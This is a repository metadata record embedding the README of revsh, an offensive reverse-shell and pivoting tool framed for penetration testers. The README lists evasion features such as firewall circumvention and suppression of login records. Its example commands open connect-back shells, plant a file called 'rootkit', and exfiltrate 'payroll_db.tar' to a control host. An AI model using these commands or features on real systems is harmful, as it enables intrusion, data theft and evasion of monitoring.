{"id":13539433,"url":"https://github.com/emptymonkey/revsh","last_synced_at":"2025-04-02T06:30:56.003Z","repository":{"id":9580708,"uuid":"11496537","full_name":"emptymonkey/revsh","owner":"emptymonkey","description":"A reverse shell with terminal support, data tunneling, and advanced pivoting capabilities.","archived":false,"fork":false,"pushed_at":"2024-07-10T00:42:37.000Z","size":597,"stargazers_count":464,"open_issues_count":11,"forks_count":93,"subscribers_count":30,"default_branch":"main","last_synced_at":"2025-03-26T14:29:49.406Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":"","language":"C","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/emptymonkey.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2013-07-18T07:07:34.000Z","updated_at":"2025-03-22T10:38:47.000Z","dependencies_parsed_at":"2022-07-30T01:37:51.941Z","dependency_job_id":"e502529d-07b7-4c73-ae2c-7e8b05a0cf89","html_url":"https://github.com/emptymonkey/revsh","commit_stats":{"total_commits":253,"total_committers":7,"mean_commits":"36.142857142857146","dds":0.04743083003952564,"last_synced_commit":"36a9a9070db06af7a6a0da240fbc2d3a0a7e71bd"},"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/emptymonkey%2Frevsh","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/emptymonkey%2Frevsh/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/emptymonkey%2Frevsh/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/emptymonkey%2Frevsh/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/emptymonkey","download_url":"https://codeload.github.com/emptymonkey/revsh/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":246767703,"owners_count":20830536,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-08-01T09:01:25.850Z","updated_at":"2025-04-02T06:30:55.342Z","avatar_url":"https://github.com/emptymonkey.png","language":"C","funding_links":[],"categories":["\u003ca id=\"1a9934198e37d6d06b881705b863afc8\"\u003e\u003c/a\u003e通信\u0026\u0026代理\u0026\u0026反向代理\u0026\u0026隧道","\u003ca id=\"01e6651181d405ecdcd92a452989e7e0\"\u003e\u003c/a\u003e工具","C"],"sub_categories":["\u003ca id=\"56acb7c49c828d4715dce57410d490d1\"\u003e\u003c/a\u003e未分类-Proxy","\u003ca id=\"9d6789f22a280f5bb6491d1353b02384\"\u003e\u003c/a\u003e隧道\u0026\u0026穿透"],"readme":"# revsh #\n\n_revsh_ is a tool for establishing [reverse shells](http://en.wikipedia.org/wiki/Reverse_shell) with [terminal](http://en.wikipedia.org/wiki/Computer_terminal) support, reverse [VPNs](https://en.wikipedia.org/wiki/Virtual_private_network) for [advanced pivoting](https://en.wikipedia.org/wiki/Exploit_(computer_security)#Pivoting), as well as arbitrary data tunneling.\n\n## News ##\n\n* __2018-08-09__: New release. Mosly bug / stability fixes and better documentation on the build process with OpenSSL 1.1.0. See the _Installation_ section below for the updated build instructions.\n\n## Overview ##\n\n**What is a \"reverse shell\"?**\n\nA reverse shell is a network connection that grants [shell](http://en.wikipedia.org/wiki/Shell_%28computing%29) access to a remote host. As opposed to other remote login tools such as [telnet](http://en.wikipedia.org/wiki/Telnet) and [ssh](http://en.wikipedia.org/wiki/Secure_Shell), a reverse shell is initiated by the remote host. This technique of connecting outbound from the remote network allows for circumvention of firewalls that are configured to block inbound connections only. \n\n**What is a \"reverse VPN\"?**\n\n_revsh_ is capable of attaching a virtual ethernet card (tun/tap) to both ends of its crypto tunnel. These cards can then be used to forward raw IP packets or ethernet frames. When combined with an Iptables NAT rule, or bridging a real ethernet card, this allows for the operator to receive a fully routable IP address on the target machines network. This, essentially, is a full VPN that has performed a connect-back call to the operator to circumvent in-bound packet filtering and grant the operator full network access. (See [\"Documentation/REVERSE_VPN.md\"](https://github.com/emptymonkey/revsh/blob/master/Documentation/REVERSE_VPN.md) for more information.)\n\n**What is a \"bind shell\"?**\n\nA [bind shell](http://en.wikipedia.org/wiki/Shellcode#Remote) is a shell that is served from a normal forward network connection. _revsh_ supports both reverse and bind shells. To invoke a bind shell you can either invoke the _-b_ flag on both ends of the connection, or invoke the binary as '_bindsh_'.\n\n\n**Can't I just use [netcat](http://en.wikipedia.org/wiki/Netcat)?**\n\nThere are [many techniques](http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet) for establishing a reverse shell, but these methods don't provide terminal support. _revsh_ allows for a reverse shell whose connection is mediated by a [pseudo-terminal](http://en.wikipedia.org/wiki/Pseudoterminal), and thus allows for features such as:\n\n * [job control](http://en.wikipedia.org/wiki/Job_control)\n * [control character processing](http://en.wikipedia.org/wiki/Control_character) (e.g [Ctrl-C](http://en.wikipedia.org/wiki/Control-C))\n * [auto-completion](http://en.wikipedia.org/wiki/Auto-completion)\n * support for programs requiring a [controlling tty](https://github.com/emptymonkey/ctty) (e.g. vi)\n * [processing of window re-size events](http://linux.die.net/man/4/tty_ioctl)\n\nIn addition, _revsh_ also offers the following features:\n * [UTF-8](http://en.wikipedia.org/wiki/UTF-8) support.\n * Circumvents [utmp / wtmp](http://en.wikipedia.org/wiki/Utmp). (No login recorded.)\n * Processes [rc file](http://en.wikipedia.org/wiki/Run_commands) commands upon login for easy scripting.\n * [OpenSSL](https://www.openssl.org/) encryption with key based authentication baked into the binary.\n * Anonymous [Diffie-Hellman](http://en.wikipedia.org/wiki/Diffie%E2%80%93Hellman_key_exchange) encryption upon request.\n * Ephemeral Diffie-Hellman encryption as default. (Now with more [Perfect Forward Secrecy](http://en.wikipedia.org/wiki/Forward_secrecy)!)\n * [Cert pinning](http://en.wikipedia.org/wiki/Transport_Layer_Security#Certificate_pinning) for protection against [sinkholes](http://en.wikipedia.org/wiki/DNS_sinkhole) and [mitm](http://en.wikipedia.org/wiki/Man-in-the-middle_attack) counter-intrusion.\n * Connection timeout for remote process self-termination.\n * Randomized retry timers for non-predictable auto-reconnection.\n * Netcat style non-interactive data brokering for file transfer.\n * Proxy support: point-to-point, SOCKS 4, SOCKS 4a, and SOCKS 5. Proxys are available in both directions for complete flexibility.\n * TUN / TAP support for forwarding raw IP packets / Ethernet frames.\n * Escape sequence commands to kill non-responsive nodes, or print connection statistics.\n\n\n_revsh_ is intended as a supplementary tool for a [pentester's](http://en.wikipedia.org/wiki/Pentester) toolkit that provides the full set of terminal features across an encrypted tunnel.\n\n**Where can I use _revsh_?**\n\n_revsh_ was developed on x86_64 Linux. Here is a brief list of Arch / OS combinations that it has been used on:\n * x86_64 Linux\n * i686 Linux\n * amd64 FreeBSD\n\n(If you have successfully used revsh on another platform, drop me a line and I'll add it to the list.)\n\n## Usage ##\n\n\tempty@monkey:~$ revsh -h\n\t\n\tControl:\trevsh -c [CONTROL_OPTIONS] [MUTUAL_OPTIONS] [ADDRESS[:PORT]]\n\tTarget:\t\trevsh     [TARGET_OPTIONS] [MUTUAL_OPTIONS] [ADDRESS[:PORT]]\n\t\n\t\tADDRESS\t\tThe address of the control listener.\t\t(Default is \"0.0.0.0\".)\n\t\tPORT\t\tThe port of the control listener.\t\t(Default is \"2200\".)\n\t\n\tCONTROL_OPTIONS:\n\t\t-c\t\tRun in \"command and control\" mode.\t\t(Default is target mode.)\n\t\t-a\t\tEnable Anonymous Diffie-Hellman mode.\t\t(Default is Ephemeral Diffie-Hellman.)\n\t\t-d KEYS_DIR\tReference the keys in an alternate directory.\t(Default is \"~/.revsh/keys/\".)\n\t\t-f RC_FILE\tReference an alternate rc file.\t\t\t(Default is \"~/.revsh/rc\".)\n\t\t-s SHELL\tInvoke SHELL as the remote shell.\t\t(Default is \"/bin/bash\".)\n\t\t-F LOG_FILE\tLog general use and errors to LOG_FILE.\t\t(No default set.)\n\t\n\tTARGET_OPTIONS:\n\t\t-t SEC\t\tSet the connection timeout to SEC seconds.\t(Default is \"3600\".)\n\t\t-r SEC1,SEC2\tSet the retry time to be SEC1 seconds, or\t(Default is \"600,1200\".)\n\t\t\t\tto be random in the range from SEC1 to SEC2.\n\t\n\tMUTUAL_OPTIONS:\n\t\t-k\t\tRun in keep-alive mode.\n\t\t\t\tNode will neither exit normally, nor timeout.\n\t\t-L [LHOST:]LPORT:RHOST:RPORT\n\t\t\t\tStatic socket forwarding with a local listener\n\t\t\t\tat LHOST:LPORT forwarding to RHOST:RPORT.\n\t\t-R [RHOST:]RPORT:LHOST:LPORT\n\t\t\t\tStatic socket forwarding with a remote listener\n\t\t\t\tat RHOST:RPORT forwarding to LHOST:LPORT.\n\t\t-D [LHOST:]LPORT\n\t\t\t\tDynamic socket forwarding with a local listener\n\t\t\t\tat LHOST:LPORT.\t\t\t\t\t(Socks 4, 4a, and 5. TCP connect only.)\n\t\t-B [RHOST:]RPORT\n\t\t\t\tDynamic socket forwarding with a remote\n\t\t\t\tlistener at LHOST:LPORT.\t\t\t(Socks 4, 4a, and 5. TCP connect only.)\n\t\t-x\t\tDisable automatic setup of proxies.\t\t(Defaults: Proxy D2280 and tun/tap devices.)\n\t\t-b\t\tStart in bind shell mode.\t\t\t(Default is reverse shell mode.)\n\t\t\t\tThe -b flag must be invoked on both ends.\n\t\t-n\t\tNon-interactive netcat style data broker.\t(Default is interactive w/remote tty.)\n\t\t\t\tNo tty. Useful for copying files.\n\t\t-v\t\tVerbose. -vv and -vvv increase verbosity.\n\t\t-V\t\tPrint the program and protocol versions.\n\t\t-h\t\tPrint this help.\n\t\t-e\t\tPrint out some usage examples.\n\n## Installation ##\n\nFirst, you will need to build OpenSSL from source. (See __NOTE__ below.)\n\n\tgit clone https://github.com/openssl/openssl.git\n\tcd openssl/\n\t./config no-shared -static\t# These options are needed to build static applications against OpenSSL.\n\tmake \u0026\u0026 make test\t# We skip \"make install\" so we don't conflict with your systems default OpenSSL. We will build _revsh_ against the OpenSSL we just compiled in this tree.\n\tcd ..\n\nNow build revsh.\n\n\tgit clone https://github.com/emptymonkey/revsh.git\n\tcd revsh\n\tvi config.h        # Set up new defaults that fit your situation.\n\tvi Makefile        # Check that the selected build environment is the one you want. (It probably already is by default.)\n\tmake               # This *can* take a very long time, though it usually doesn't.\n\tmake install\n\tvi ~/.revsh/rc     # Add your favorite startup commands to really customize the feel of your remote shell.\n\trevsh -h\n\n__NOTE:__ With the release of OpenSSL 1.1.0, OpenSSL needs to be built from source for use in a statically linked binary. Building a statically linked binary against the OpenSSL libraries that ship with most Linux distros (including Kali) will *not* work. (If it builds at all, it will SEGFAULT.)\n\n## Examples ##\n\nControl host example IP: 192.168.0.42\n\u003cbr\u003e\nTarget host example IP:  192.168.0.66\n\n\tInteractive example on default port '2200':\n\t\tcontrol:\trevsh -c\n\t\ttarget:\t\trevsh 192.168.0.42\n\t\n\tInteractive example on non-standard port '443':\n\t\tcontrol:\trevsh -c 192.168.0.42:443\n\t\ttarget:\t\trevsh 192.168.0.42:443\n\t\n\tBindshell example:\n\t\ttarget:\t\trevsh -b\n\t\tcontrol:\trevsh -c -b 192.168.0.66\n\t\n\tNon-interactive file upload example:\n\t\tcontrol:\tcat ~/bin/rootkit | revsh -c -n\n\t\ttarget:\t\trevsh 192.168.0.42 \u003e ./totally_not_a_rootkit\n\t\n\tNon-interactive file download example:\n\t\tcontrol:\trevsh -c -n \u003epayroll_db.tar\n\t\ttarget:\t\tcat payroll_db.tar | revsh 192.168.0.42\n\t\n\tNon-interactive file download example across existing tunnel:\n\t\tcontrol:\trevsh -c -n 127.0.0.1:2291 \u003epayroll_db.tar\n\t\ttarget:\t\tcat payroll_db.tar | revsh 127.0.0.1:2290\n\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Femptymonkey%2Frevsh","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Femptymonkey%2Frevsh","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Femptymonkey%2Frevsh/lists"}